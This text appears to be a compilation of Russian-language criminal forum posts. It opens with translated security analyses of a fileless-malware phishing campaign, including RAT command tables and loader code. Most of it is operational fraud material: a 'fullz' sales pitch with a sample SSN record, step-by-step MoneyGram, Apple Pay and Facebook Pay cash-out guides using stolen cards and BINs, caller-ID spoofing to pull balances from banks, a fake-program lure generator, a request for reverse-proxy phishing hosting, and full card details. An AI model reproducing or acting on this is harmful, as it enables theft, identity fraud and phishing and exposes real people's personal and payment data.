"s_list"| 95H| List the tasks from the system Task Scheduler of the infected
system.
"task_del"| 96H| Delete a task from the system Task Scheduler.
"spread"| 97H| Spread usb.
"bg_change"| 98H| Change the desktop background of the victim's desktop.
"scr_off"| 99H| Turn off screen.
"browsers_clear"| 9BH| Close the browsers such as Chrome, Firefox, Edge,
Opera, IE, Vivaldi, Brave, Chromium, Torch, UCBrowser and clean its data.
"notes_get"| 9CH| Obtain notes that were set to the victim’s device.
"notes_set"| 9DH| Set notes to the victim device.
"website_open"| 9FH| Open a website with the default web browser on the
victim's device.
"vol_edit"| A0H| Change master volume.
"msgbox"| A3H| Display the victim a message box with a message.
"clipboard_get"| A2H| Obtain the system clipboard data from the victim's
system.
"injdll"| A4H| Inject a dll into a specified process or all processes.
"chat_start"| A9H| Pop up a chatting box to the victim.
"chat_msg"| AAH| Chat with the victim using the chatting box.
"chat_stop"| ABH| Stop chatting.
Во второй части этой серии я исследовал три бесфайловых полезных нагрузки
вредоносных программ, включенных в фишинговую кампанию. Я также объяснил, в
какие процессы они внедряются и выполняются.
Далее я представил, как эти три вредоносных программы подключаются к своему
C2-серверу, и описал структуру пакетов, отправляемых на C2-сервер. Я также
представил значения в пакетах управляющих команд, отправляемых вредоносным
клиентам для управления устройством жертвы для выполнения дальнейших
вредоносных задач.
Я подробно описал функции, предоставляемые тремя вредоносными программами, и
использовал несколько примеров, чтобы показать, как злоумышленник их
использует. Из моего исследования вы также узнали о различиях между их
особенностями.
Я также сделал три таблицы, чтобы перечислить команды управления с краткими
описаниями
Перевод [ЭТОЙ](https://www.fortinet.com/blog/threat-research/phishing- campaign-delivering-fileless-malware-part-two) статьи.
Существует трюк, позволяющий взламывать аккаунты WhatsApp с помощью функции переадресации вызовов и получать доступ к личным сообщениям и спискам контактов. Метод основан на использовании автоматизированной услуги мобильных операторов по переадресации звонков на другой номер телефона и возможности WhatsApp отправлять код верификации одноразового пароля (OTP) через голосовой вызов.
Man Machine Interface (MMI)
Рахул Саси, основатель и генеральный директор компании по защите от цифровых рисков CloudSEK, опубликовал некоторые подробности об этом методе, заявив, что он используется для взлома аккаунта WhatsApp. Специалисты BleepingComputer провели тестирование и обнаружили, что метод работает, хотя и с некоторыми оговорками, которые может преодолеть достаточно опытный хакер.
Для того чтобы завладеть учетной записью WhatsApp жертвы, хакеру потребуется всего несколько минут, но он должен знать номер телефона жертвы и быть готовым применить социальную инженерию. Саси говорит, что хакеру сначала нужно убедить жертву сделать звонок на номер, начинающийся с кода MMI, который оператор мобильной связи установил для включения переадресации. В зависимости от оператора, определенный код MMI может переадресовывать либо все звонки на терминал на другой номер, либо только тогда, когда линия занята или нет приема.
Эти коды начинаются со звездочки (*) или символа решетки (#). Их легко найти, и, судя по проведенному исследованию, все основные операторы мобильной связи поддерживают их.
"Сначала вы получаете звонок от злоумышленника, который убеждает вас сделать звонок на номер *67 или 405. В течение нескольких минут ваш WhatsApp будет отключен, и атакующий получит полный контроль над вашей учетной записью", - говорит Рахул Саси.
Click to expand...
Исследователь объясняет, что 10-значный номер принадлежит хакеру, а стоящий перед ним код MMI указывает оператору мобильной связи переадресовывать все звонки на указанный после него номер телефона, когда линия жертвы занята.
Обманом заставив жертву переадресовывать звонки на свой номер, хакер запускает процесс регистрации WhatsApp на своем устройстве, выбирая опцию получения одноразового пароля (OTP) через голосовой вызов.
WhatsApp отправляет OTP-коды через текстовый или голосовой вызов:
После получения OTP-кода хакер может зарегистрировать учетную запись WhatsApp жертвы и включить двухфакторную аутентификацию (2FA), которая не позволяет законным владельцам аккаунта восстановить доступ.
Некоторые предостережения
Хотя метод кажется простым, для того чтобы он сработал, все-таки требуется немного больше усилий, как выяснили специалисты в ходе тестирования.
Во-первых, хакеру необходимо убедиться, что он использует код MMI, который переадресует все вызовы, независимо от состояния устройства жертвы (безоговорочно). Например, если MMI переадресует звонки только в том случае, когда линия занята, ожидание вызова может привести к неудаче перехвата.
В ходе тестирования специалисты заметили, что на устройство жертвы также приходили текстовые сообщения, информирующие о том, что WhatsApp зарегистрирован на другом устройстве.
Пользователи могут пропустить это предупреждение, если хакер также обратится к социальной инженерии и будет вовлекать жертву в телефонный разговор достаточно долго, чтобы получить OTP-код WhatsApp через голосовой вызов.
Если переадресация уже была активирована на устройстве жертвы, хакерам придется использовать другой номер телефона, отличный от того, который использовался для переадресации - небольшое неудобство, которое может потребовать дополнительных мер социальной инженерии.
Наиболее явный признак подозрительной активности для атакуемого пользователя появляется после того, как операторы мобильной связи включают переадресацию на его устройстве, поскольку активация сопровождается предупреждением на экране, которое не исчезает, пока пользователь не подтвердит его:
Даже с таким хорошо заметным предупреждением у злоумышленников все еще есть хорошие шансы на успех, поскольку большинство пользователей не знакомы с кодами MMI или настройками мобильного телефона, которые отключают переадресацию.
Несмотря на эти препятствия, хакеры с хорошими навыками социальной инженерии могут разработать сценарий, который позволит им отвлекать жертву разговором по телефону, пока они не получат OTP-код для регистрации скомпрометированной учетной записи WhatsApp на своем устройстве. Эксперты BleepingComputer говорят, что они протестировали этот метод с помощью мобильных сервисов Verizon и Vodafone и пришли к выводу, что хакер с правдоподобной легендой и хорошими знаниями СИ, скорее всего, сможет перехватить учетные записи WhatsApp.
В посте Саси речь идет о мобильных операторах Airtel и Jio, каждый из которых, согласно открытым данным, имеет более 400 миллионов клиентов по состоянию на декабрь 2020 года.
Защититься от атак такого типа можно, включив двухфакторную аутентификацию в WhatsApp. Эта функция не позволяет злоумышленникам получить контроль над учетной записью, запрашивая PIN-код при каждой регистрации телефона в приложении для обмена сообщениями.
Перевод!!! Оригинал тут https://www.bleepingcomputer .com/news/security/hackers-steal-whatsapp-accounts-using-call-forwarding- trick/
В этом анализе я покажу, как фишинговой кампании удается передать бесфайловое
вредоносное ПО на устройство жертвы, какой механизм он использует для
загрузки, развертывания и выполнения бесфайлового вредоносного ПО в целевом
процессе и как он поддерживает постоянство на устройстве жертвы. устройство.
Затрагиваемые платформы: Microsoft Windows
Затронутые стороны: пользователи Microsoft Windows
Воздействие: Контролирует устройство жертвы и собирает конфиденциальную
информацию.
Уровень серьезности: критический
Захваченное фишинговое письмо показано на рисунке 1.1. Оно было замаскировано под уведомление об отчете об оплате из надежного источника.
Рисунок 1.1 – Фишинговое письмо
Это электронное письмо пытается заставить получателя открыть вложенный документ Excel для подробностей отчета. Как видите, это фишинговое письмо определяется службой [FortiMail ](https://www.fortinet.com/products/email- security/fortimail.html?utm_source=blog&utm_campaign=fortimail-main-page)и помечается как «[СПАМ, обнаруженный FortiMail]» в строке «Тема», чтобы предупредить получателя.
Документ Excel называется «Remittance-Details-951244.xlam». Это файл надстройки Excel (*.xlam), содержащий вредоносные макросы. Когда получатель запускает его в программе Microsoft Excel, всплывает уведомление о безопасности, спрашивающее пользователя, хотят ли они включить макросы, как показано на рис. 2.1.
Рисунок 2.1 – Уведомление о безопасности, которое появляется при открытии документа Excel
Он содержит макрос автозапуска, который запускается с использованием метода
VBA (приложения Visual Basic) с именем
«Autpen()»
при открытии файла Excel.
Просматривая код VBA внутри метода, я узнал, что он декодирует командную
строку и выполняет ее с помощью [WMI ](https://docs.microsoft.com/en-
us/windows/win32/wmisdk/retrieving-a-class)(Windows Management
Instrumentation).
Рисунок 2.2 – Объект WMI, используемый для выполнения декодированной команды
Рисунок 2.2 представляет собой фрагмент кода VBA метода
«Autpen()»,
показывающий, где он собирается создать объект WMI для выполнения
декодированной строковой команды «C:\\ProgramData\\ddond.com
hxxps://taxfile[ .]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file»,
как показано внизу рисунка 2.2.
Перед этим он копирует локальный файл «C:\Windows\System32\mshta.exe» в
«C:\ProgramData\» и переименовывает его в «ddond.com». «mshta.exe» — это
собственный двоичный файл Windows, предназначенный для выполнения файлов
Microsoft HTML Application (HTA). Помните, что «C:\ProgramData\ddond.com»
теперь является дубликатом «mshta.exe», который будет использоваться на
протяжении всей кампании. Например, чтобы запутать исследователей, он
использует скопированный файл «ddond.com» для загрузки и запуска вредоносного
html-файла, а не «mshta.exe».
Он загружает файл «APRL27.htm», который анализируется «ddond.com» (то есть «mshta.exe»). Файл HTML содержит фрагмент кода JavaScript, закодированный с использованием метода экранирования URL. Я расшифровал его и упростил код, как показано на рис. 3.1.
Рисунок 3.1 – Упрощенный код JavaScript из APRL27.html
Он создает объект «Wscript.Shell», используя приведенную ниже инструкцию.
«Wscript.Shell» извлекается с использованием метода «_0x5b4b3f(0x391, 0x391)»,
который используется для возврата строки по ее индексу.
chuchukukukaokiwDasidow = новый ActiveXObject(_0x5b4b3f(0x391, 0x391));
«chuchukukukaokiwDasidow» — это созданный объект оболочки ОС, используемый для
запуска приложения. На рис. 3.1 мы видим, что он запускает пять приложений
командной строки следующим образом.
Он запускает приложение PowerShell для загрузки файла PowerShell с именем
«mainpw.dll», а затем запускает его.
Затем он запускает schtasks для создания запланированной задачи с именем
«calendersw» в системе «Планировщик заданий». Он выполняет команду
«C:\ProgramData\ddond.com
hxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file» каждые 82
минуты, что выглядит как разбор «APRL27.html». . Это также механизм
сохранения. После запуска back.htm добавляет больше запланированных задач.
Он также запускает taskkill для уничтожения процессов, если они существуют, в
MS Word (WinWord.exe), MS Excel (Excel.exe) и MS Pointpoint (POWERPNT.exe).
Рисунок 3.2 – Трафик APRL27.htm
На рис. 3.2 показан снимок экрана прокси-программы HTTP, показывающий пакеты
от «APRL27.htm» до «mainpw.dll», отмеченные красным прямоугольником. Зеленое
поле (back.htm) и синее поле (Start.htm) — это другие группы запросов от
других команд «ddond.com», запускаемых планировщиком заданий.
Файл mainpw.dll (размер 7,58 МБ) полон кода PowerShell, который можно
разделить на три части для трех безфайловых вредоносных программ. На рис. 3.3
показана упрощенная структура «mainpw.dll».
Рисунок 3.3 – Схема кода PowerShell внутри «mainpw.dll»
Этот код состоит из трех сегментов кода и использует одинаковую логику кода для каждого вредоносного ПО. Я объясню, как это работает для каждой вредоносной программы через их переменные.
Code:Copy to clipboard
[byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH = Get-
DecompressedByteArray $nona
[byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-
DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI
В конце каждого сегмента вредоносного кода код вызывает метод «Load()» для
загрузки внутреннего модуля .Net из «$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG».
Затем он вызывает метод Invoke() для вызова функции projFUD.PA.Execute()
внутреннего модуля .Net с двумя параметрами: полным путем к исполняемому файлу
и бесфайловой полезной нагрузкой вредоносного ПО. Вот фрагмент кода
PowerShell, использованный для
первой вредоносной программы.
Code:Copy to clipboard
[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe',$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))
Это внутренний модуль .Net, который динамически извлекается из второй переменной $hexString. Его функция «projFUD.PA.Execute()» вызывается из PowerShell, где «projFUD» — пространство имен, «PA» — имя класса, а «Execute()» — функция-член класса «PA». На рис. 4.1 показана ошибка отладчика при входе в эту функцию.
Рисунок 4.1 – Обрыв на входе функции «projFUD.PA.Execute()»
Снизу, на подвкладке переменных «Местные», мы видим два переданных параметра. Затем он выполняет очистку процесса, чтобы внедрить полезную нагрузку вредоносного ПО во вновь созданный процесс «aspnet_compiler.exe».
Рисунок 4.2 – Создание приостановленного процесса
Затем функция «Execute()» вызывает Windows API «CreateProcessA()» для создания процесса «aspnet_compiler.exe» с флагом создания 0x8000004. Это комбинация CREATE_NO_WINDOW и CREATE_SUSPENDED, как показано на рис. 4.2. Затем он выделяет память внутри этого процесса и развертывает в нем данные полезной нагрузки вредоносного ПО. Он изменяет значение по адресу памяти 0x7EFDE008, где сохраняет базовый адрес процесса PEB (блок среды процесса) и изменяет реестр процесса, чтобы его EIP (расширенный указатель инструкций) указывал на скопированную полезную нагрузку вредоносного ПО. Чтобы закончить, ему нужно несколько раз вызвать API WriteProcessMemory(), а также API Wow64SetThreadContext(). После того, как все вышеперечисленные шаги были выполнены, он, наконец, вызывает API ResumeThread(), чтобы процесс запускал полезную нагрузку вредоносного ПО. Ниже приведен код, используемый для вызова этого API. «processInformation.ThreadHandle» — это дескриптор потока только что созданного процесса.
Code:Copy to clipboard
num15 = (int)PA.LX99ujNZ7X3YScj6T4(PA.ResumeThread, PA.vgxYHnXuOV51G6NIu3("010010010110111001110110011011110110101101100101"), CallType.Method,
new object[]
{
processInformation.ThreadHandle
});
В этом анализе я объяснил, как вложение документа Excel к замаскированному
фишинговому письму отправляется на устройство жертвы и как вредоносный код
внутри документа Excel автоматически выполняется после его открытия
получателем.
Я также показал, как код VBA приводит к доступу к удаленному html-файлу
(APRL27.htm) с помощью скопированной команды «mshta.exe». Этот файл содержит
вредоносный код JavaScript, который будет выполнен позже. Я также
продемонстрировал, как он выполняет постоянство, добавляя задачи в системный
«Планировщик заданий», чтобы они оставались на устройстве жертвы.
Я также объяснил, как он получает три безфайловых вредоносных программы в
огромном загруженном файле PowerShell, чтобы обойти обнаружение, и как они
позже развертываются и выполняются внутри целевых процессов с помощью Process
Hollowing. Эти три безфайловых вредоносных программы —
AveMariaRAT/BitRAT/PandoraHVNC.
Во второй части этого анализа я сосредоточусь на этих трех безфайловых
вредоносных программах, чтобы увидеть, что они делают на устройстве жертвы, а
также какие данные они могут украсть.
Перевод [ЭТОЙ](https://www.fortinet.com/blog/threat-research/phishing- campaign-delivering-fileless-malware) статьи.
Recently I have been receiving frequent requests for profiles with known CS
(credit score)
Let's figure out what it is and explain it in a way that even a beginner can
understand
Profile or as it is often called "fullz" is full information about the person
including DOB(date of birth), SSN(social security number), home
address,
phone number ,email ,DL(driving license number) and other personal
information.
Here is an example of SSN+DL profile:
1989-06-03,519-31-3562,Amanda,LeAnne,Hammer,3219 Turning Leaf St,caldwell,83605,ID,ID,amandahammer@my.cwi.edu,(2 08) 965-5287,AB159682G
Click to expand...
DOB, SSN, FIRST, MIDDLE, LAST, ADDR, CITY, ZIP, STATE, DL STATE, EMAIL, PHONE, DL
Click to expand...
Highlights:
Credit scores are three-digit numbers that show an important piece of your
financial history.
Credit scores help lenders decide whether to grant you credit.
The average credit score in the United States is 698, based on VantageScore
data from February 2021.
When a customer asks for a profile with a known CS they usually look for 700+ or even 800. These profiles are needed to apply for loans, stuff financing and other credits. Obviously, the general rule is the higher a borrower's credit score, the higher the likelihood of being approved. Furthermore, many lenders have a minimum credit score requirement before an applicant is approved for a new loan or credit card. And after all, it is often more attractive loan offers for borrowers who have good-to-excellent credit.
**pros and cons of profiles with a known CS:
+** Less time to get a result. You reduce the risk of failure due to bad CS
+ By doing a CS check you automatically check if the data is up to date
- Someone might have already seen your profile. It was not just sold
straight out breached database.
- You don't know what method was used for CS check. It might be a red flag
for getting credit or loan.
_
You never knew if the check was automated by the seller, or it was outsourced
to low quality worker who can save some info to earn extra money. Or if he
gets angry at their employer because they are underpaid. Thing happens.
For example, some financial services do offer a credit check - let's say your profile has already been checked on a site you are going to apply. And that site forced to create an account for check or at least leave them email. After buying a profile, you go there again, create a new account and pretend you don't know anything. Guess what's next?_
**So considering all of the above, is it worth it to buy a profile with the known CS or is it better to do it yourself?
—** If the vendor claims that CS is a part of the database, and he wasn't looking it up Intentionally, then yes, it's worth picking up. Most likely the database was leaked from financial services and if you believe him you're golden.
— If the vendor says that CS has been looked up and/or he is selling CS lookup, I would say no. Watch a breakdown of the disadvantages Above.
**So what should you do if you don 't want to do the search yourself and no vendor has been found? Here's a tip for you:
Find a state with high salaries.
Handpick city or even county with expensive property.** (zillow.com or
similar)**
Then ask your vendor for profiles with this zip/city/county. Most of them will
have a high
CS.**
And remember, when you buy profiles from me, you can always be sure that they have not been used anywhere else.
МОЯ СТАТЬЯ
Всем привет,статья паблик но добавил свои доработки и пару бинов!
Покупаешь сс 473702 или любой велсовский бин
911 юзаешь любой usa носок с норм пингом до 39
Заходишь на монейграм логинешься и нажимаешь fargot password бьешь код на
почту
Заходишь на почту берешь код(чисть ее после как введёшь код)
Сменил пас заходишь в ак под новым пасом
Заходишь на пакс(paxfull) ищешь трейдера филипин(пишешь валюта php) страну
выбираешь любую
выбераешь систему moneygram
Ищешь трейдера именно что бы страна была филипины
Создаешь сделку просишь данные first name/last name
После заходишь в ак нажимаешь в правом углу виев профиль
Меняешь 1-3 цифры в номере сэйвиш,там же убераешь галочку что бы смс падали
только на почту и нажимаешь клоус профиль,потом сенд моней и вводишь сумму на
сколько сделку открыл в паксе потом нэйм ласт нэйм
Потом меняешь бил его сверь что бы он точный был в сс
Добавляешь адрес потом саму картелу и отправляешь
1 вариант после того как отправишь кинет код на почту(значит транза прошла) но если транза прошла и там вайтинг фор апрувал то может упасть еще деклайн или кансел это если нет бабок
2 вариант кинет на дл(грузишь левые юса дл,вообще левые)(ДЛЯ ПРОСТОТЫ РЕГАТЬ ЛУЧШЕ НА СВОИ ДЛ)
3 вариант сразу клоус профиль (либо дроп ггвп либо картела фродовая менять ее надо
4 вариант кинет на вопросы(типо откуда куда зачем почему)
В 1 окно что выходит я пишу так
(good relationship work together)(МОЖНО ПИСАТЬ ЧТО ДУШЕ УГОДНО)
В 2 окно пишу так (sending the debt)(МОЖНО ПИСАТЬ ЧТО ДУШЕ УГОДНО)
И ниже ставишь две галочки на yes/yes
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
АВТОРСКАЯ СТАТЬЯ ХОЗЯИНА НЕ ЗНАЮ!
Обнал MoneyGram.
Требования:
Старый аккаунт с минимум 1-2 транзакции.
Любая хорошая USA CC. Рекомендую бины: 400022/473702 (сам с них налил).
️
911/SOCKS5
1. Переходим на Moneygram, на главной странице выбираем свою свой материк, и
свою страну.
2. Нас перекинет на другую вкладку. Входим в наш прогретый акк MoneyGram.
3. Как только вы войдете в аккаунт вас попросит данные получателя, ничего не
нажимаем и выходим на главную страницу.
4. Теперь нажимаем на три полосы и «Send Money». Потом ставим сумму не больше
200$.
5. Добавляем информацию о получателе (банк).
6. После чего оплачиваем и радуемся жизни.
️
Примечания:
- Иногда монейграм отправляет код на номер телефона аккаунта, нужно убедиться
что у нас есть доступ к номеру телефона.
- На все действия необходимо потратить 15-20 минут, ибо вас просто зафродит и
транза будет отклонена.
- Полностью проверьте свой биллинг адрес, так как в моней грам нет 3Ds, но
есть пиздец какая провека биллинга.
- Так же для сенда мы можем использовать новорег, но тут уже бины по выборке.
ТЕМА РАБОТАЕТ И ПО СЕЙ ДЕНЬ,ТОЛЬКО НАЙДИТЕ НОРМАЛЬНЫЙ ШОП КАРТЕЛ)))
ОБЯЗАТЕЛЬНЫЕ МОМЕНТЫ СМЕНА НОМЕРА НА ПАРУ ЦИФР ЕСЛИ БУДЕТЕ СЛАТЬ НА
ФИЛИПИНЫ,ТАК КАК ЕСЛИ НЕ СМЕНИТЕ БУДЕТ КИДАТЬ КОНФИРМ КОД НА ТЕЛЕФОН А НЕ НА
ПОЧТУ(ДАННАЯ ФУНКЦИЯ ЖЕЛАТЕЛЬНА ПРИ РАБОТЕ С АККАМИ К КОТОРЫМ ЕСТЬ ДОСТУП К
ПОЧТЕ!)
С САМОРЕГОВ ХОРОШО ИДЁТ НА РАЗЛИЧНЫЕ СТРАНЫ ТЕСТИРУЙСТЕ РАЗВИВАЙТЕСЬ!
бины что я юзал,суммы не большие до 450$ давало спокойно не со всех!
476559
415982
400177
400022
473702
473703
549112
521870
**К СЛОВУ,РЕКОМЕНДУЮ БРАТЬ ТОЛЬКО ДЕБЕТОВКИ!!!
С КРЕДАМИ ПЕЧАЛЬНО ВСЁ!
https://wwh-club[.]io/index.php?thr...alit-i-zalivat-money-gramm-po-sej- den.234892/
**
Spoiler: Amazon
Зайдите на Amazon и создайте аккаунт под проксей или используйте старый
аккаунт Amazon.
Повесите на акке и добавьте корзину всякий хлам, после чего выйдите из
системы.
Вернитесь примерно через час и очистите свою корзину. После этого наступает
самое время проявить активность.
Лично я заказываю на 200-500$ BIN 423561
Spoiler: FacebookPay
Оплата через Facebook
1. Скачайте мессенджер из App Store
2. Купите логи Facebook и подготовьте 2 аккаунта мессенджера
3. Войдите в одну учетную запись (мы назовем её получателем), добавьте свою
карту (лучше всего работает Moneylion), также может быть Chime или Greendot
(UPD: карта CashApp не поддерживается с 20 января 2021 года - обновление
мессенджера)
4. Войдите в другую учетную запись и добавьте туда лог PayPal (мы назовем её
отправителем).
5. Отправьте деньги со счета отправителя получателю, просто найдите имя
учетной записи получателя
6. Примите запрос на сообщение в учетной записи получателя
7. Отправьте деньги себе, используя опцию $, начните с малого (я начинаю с
$10, $15, $25, $50, $75)
8. Продолжайте отправлять, пока не получите сообщение “Платеж не может быть
обработан”.
9. Возьмите другой лог и повторите шаги 7-8
Если вы получаете сообщение “Платежи отключены или невозможны”, это означает,
что ваша учетная запись FB заблокирована, попробуйте другую учетную запись
мессенджера.
Если вы получаете сообщение “Платеж не может быть обработан”, в журнале PP /
карте / банке недостаточно денег.
Если вы получите сообщение “Произошла ошибка”, попробуйте другой журнал FB или
повторно установите
Spoiler: ApplePay
1. Приобретите новый или старый Iphone или Ipad, которые никогда не
использовались с Apple pay.
2. Подтвердите 1 из учетных записей с помощью apple pay cash. Оно должно
совпадать с именем и
адресом, указанными в водительских правах и телефоне.
3. После подтверждения создайте еще один аккаунт на том же iphone / ipad,
если он это позволяет. Если нет
, купите новый телефон или ipad.
4. Получите CC или Debit log с доступом к электронной почте и добавьте его в
apple pay. Как только вы
подтвердите это с помощью банковского доступа или электронной почты, вы
сможете отправлять наличные с дебетовой или кредитной карты.
5. 2 способа добавления денег 1-й способ - перейти в apple pay cash на счет,
на котором указан
cc или дебет, и нажать "Добавить деньги", а затем узнать, сколько. Если
подтверждено, добавьте
1500 долларов, если не подтверждено, добавьте 450 долларов. Как только деньги
будут добавлены, вы можете перейти в imessage и
отправить их на свой другой аккаунт с помощью своих денег в apple pay
наличными.
6. 2-й способ - отправить str8 человеку через imessage вместо добавления его
в
учетную запись.
Spoiler: BuyOnTrust.com
Необходимые инструменты
Хороший Whitehead CPN
Хорошие Proxy
DL Спереди, Сзади и Селфи
Fullz инфа с BG И CS
Информация о Банковском счете
1. Этот веб-сайт является авторским после того, как вы завершите регистрацию
и получите одобрение
(This website is a authorship after you complete the sign up and get
approved)
2. Если вам в первый раз отказали, не будьте занудой, найдите себе уайтхеда и
попросите его создать для вас учетную запись
3. Если вы получите одобрение, вы должны быть зеленого цвета.
4. Сойти с ума!!!!! Никаких Карточек Или Чего-То Еще
5. Невозможно обойти эту информацию, должна быть основная учетная запись и
хороший кредитный рейтинг.
(Вообще ничего не понял в этом гайде, но мб кто то из вас поймет)
Spoiler: Chime
Скачайте биткоин-приложение Block Folio.
Получите логин и ID клиента Chime, чтобы создать учетную запись с помощью
Block Folio и подтвердить ее, после этого прикрепите свой логин в банке chime,
соберите код и внесите депозиты. Он покажет вам лимит, чтобы вы могли знать,
сколько нужно внести.
Spoiler: Nike
1. Бины 374355, 412039 и 412185 находятся под пользовательским банком,
который автоматически отправляет деньги.
3. Купите Proxy рядом с картой
4. ship = drop&bill = billing
Spoiler: SquarePos
1. Зарегистрируйтесь с помощью SSN На Squareup.com .
2. После Подтверждения с помощью Square загрузите приложение Square POS на
свое устройство.
3. Войдите в систему и закажите вериф чтобы обойти проверку.
4. Когда инструмент прибудет, зайдите в приложение Sqaure POS И зарядите свой
CC на 100 долларов, продолжайте добавлять, пока не достигнете 1500 долларов.
(Если система начинает выбивать деклайны то купите новый ).
5. Ссылка на банк-дроп SquarePOS
6. Готово, Подойдите к банкомату с Square CC и dвыводите деньги.
Гайды переведены с англ. ресурсов и не являются моими. Оригинал прилагаю.
Пару лет назад написал программку, которая создает фейки программ на основе их
скриншотов.
Идея совсем не нова, но готовых утилит я тогда не нашел (или плохо искал).
Возможно кто-то для себя найдет ее применение.
Скачать (пароль xss.is)
](https://anonfiles.com/zf00w2q1o3/create_fake_zip)
anonfiles.com
Принцип работы.
1. Создаем фейк на основе скриншота реальной программы.
2. Добавляем ссылку на свой сайт или платный файлообменник.
3. Отдаем фейк пользователю (например, через облака майлру, ядиск, 4shared и
т.п.).
4. После запуска файла, через 2 секунды появляется предупреждающее сообщение,
напр., об обновлении версии программы. Текст и вид сообщения может изменить
сами.
5. После согласия пользователя, открывается браузер с нужным сайтом.
6. ???
7. Profit
ps
В архиве есть исходники (написано на PureBasic)
pss
То ли из-за моей криворукости, то ли из-а особенностей purebasic, на фейки
немного ругается VT. Но облака типа майлру к ним относятся спокойно.
Приветствую.
Хочу собирать данные логин\пасс\куки, работал с модлишкой 1.5 года назад.
Подскажите други ситуацию с размещением на текущий момент фейков
реверспрокси и купленных под это дело доменов.
Где и как лучше хостить (фастфлюкс?) ? Сколько в среднем живет хост\домен,
если фейк крупных банков\трейд контор?
Какую клоаку лучше юзать?
SSN (взавимости от банка)
Google Voice
Spooftel или SpoofCard аккаунт
Сам процесс:
1. Пробиваем SSN
2. Узнаём номер банка
3. Прозваниваем банк
CC, подойдут только с номером телефона холдера.
В моём случае это: 4744760081177217.
Надобность пробива SSN или остальной инфы - зависит от банка.
Узнаём номер банка
Идём на bins.pro, пробиваем банк-эмитент купленной CC.
В моём случае это: "BANK OF AMERICA, N.A."
Гуглим оф. сайт банка. М моём случае долго гуглить не пришлось
Ищём контакты:
Выбираем штат:
Выбираем причину по которой мы хотим связаться с банком:
Получаем номер:
Прозваниваем банк
Покупаем акк Google Voice (штат не важен).
Делаем акк на SpoofCard (лично я не каржу эту контору, пополняю баланс с BTC
на 9.95$).
При регистрации указываем номер купленного google voice.
Получаем SMS от SpoofCard на Google Voice, активируем аккаунт, пополняем.
После добавления кредитов в SpoofCard, идём во вкладку "Place Your"
В "Destination Number" - указываем номер банка
В "
er ID to Display" - номер холдера CC:
Жмём "Place Your
", получаем номер телефона на который будем звонить с Google Voice:
Открываем наш Google Voice, звоним по номеру выданному в SpoofCard, если
просит вводим "access code", выданный на той-же странице.
Далее нас соединяет с банковским ботом, бот перечисляет перечень
предоставляемой информации, в моём случае это "Accounts Information" под
цифрой 4, набираем 4 на тачпаде.
Далее бот просит ввести последние 4 цифры с CC либо последние 4 цифры SSN.
Вводим - в ответ получаем баланс.
Не забываем пользоваться программами или сервисами подмены номера под КХ.
На днях нашел один интересный сервис который нам предлагает бесплатные звонки
по такому плану:
В Америку, Канаду, SIPBroker и iNum - каждый звонок до 30 минут.
В страны Евразии на один уникальный номер в сутки до 30 секунд.
Звонки в Skype - длительность каждого звонка до 10 минут.
http://voipnum.com/
Пробиваем прозвоном миники и баланс и миников СС US без энролла
С балансом достаточно пробитых SSN / DOB.
В большинстве паблик банков можно пробить через бота по данным карты при звонке. Звоним с ГВ, набираем на вирт. клаве SSN DOB по запросу бота и бот диктует баланс. Если онли через телефон кх то отдаем прозвону и он звонит с подменой
При звонке просим прозвона начать с рассказа (важно):
Обязательно прозвона просим звонить с подменой!! также говорим от лица кх мол на улице, не могу чекнуть баланс собираюсь зайти в магазин продиктуйте остаток, плиз.
Звоним самим через Google Voice или Zadarma (подмена)
Если перешли на саппорта то вот фразы для чека баланса:
Hello, I'm FIRST&LAST NAME, I'm going to shop at the moment, can you please
provide me my available credit limit please?
После этого саппорт запросит вас продиктовать номер карты и свв, затем SSN,
DOB
Если все ок - он нам диктует остаток
Фразы для чека миников:
Hello, I'm FIRST/LAST NAME, I used my card to make a payment but service is
requiring code on transaction. Can you please provide me it?
Начинайте сначала с рассказа, дабы у саппа возникало как можно меньше вопросов
помимо SSN / DOB (обычно более чем SSN, DOB он запрашивает из-за подозрения).
Если запросят MMN - мне помогал СИ, даже очень хорошо. Если кх достаточно старый то просто говорим мол мать давно скончалась (именно так).
Миники
В 70% достаточно банков SSN / DOB. С дебетовыми картами может просить PIN!
Bank of America, как минимум бот однотипно одни фразы зачитывает. В связи с этим знания английского разговорного не требуются, вы будите общаться с роботом и даже без акцента он схавает английский уровня начальной школы и ваши шаблонные фразы!
Скоро везде этих ботов внедрят во всех странах где только возможно, даже не смотря на карж! Не нужно платить налоги, зарплату, больничный, бух учёт, рабочее место оборудованное для него, пропуск, оформление, оплатить отпуск, оплачивать работников которые будут следить за качеством их работы и службе безопасности, не нужно искать работника и оплачивать услуги людей по подбору персонала на это место, размещать вакансии, ну и оплачивать естественно все льготы их, а так же обучение, возможно проезд, электричество, воду которую они тратят на работе)
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/54374/
Добрый день форумчане. Имеются ССхи. Подскажите, куда можно залить? Можно ли
сналить или как то конвертировать в деньги?
«Образец» «4815821152071497|356|0521|JOSEL SAUCEDO|10251 SAN ANTONIO AVE APT F
|SOUTHGATE|CA|90280|US»
Utilizing reverse proxies offers a more advanced approach for [creating phishing web pages](https://versprite.com/blog/application-security/phishing- attacks-cloned-websites/) that not only allow users to fully authenticate to their accounts through a malicious site, but also automate the theft of information within the account. [Learn more about phishing for passwords with cloned website here.](https://versprite.com/blog/application- security/phishing-attacks-cloned-websites/)
Reverse proxies are servers that sit between clients and web servers, often to increase security, performance, and reliability of web applications. From an attacker’s perspective, reverse proxies can be used to sit between victim users and services of interest in order to [extract sensitive information or inject malicious code](https://versprite.com/blog/security-operations/software- development-life-cycle/). In general, the image below reflects a reverse proxy setup for malicious purposes:
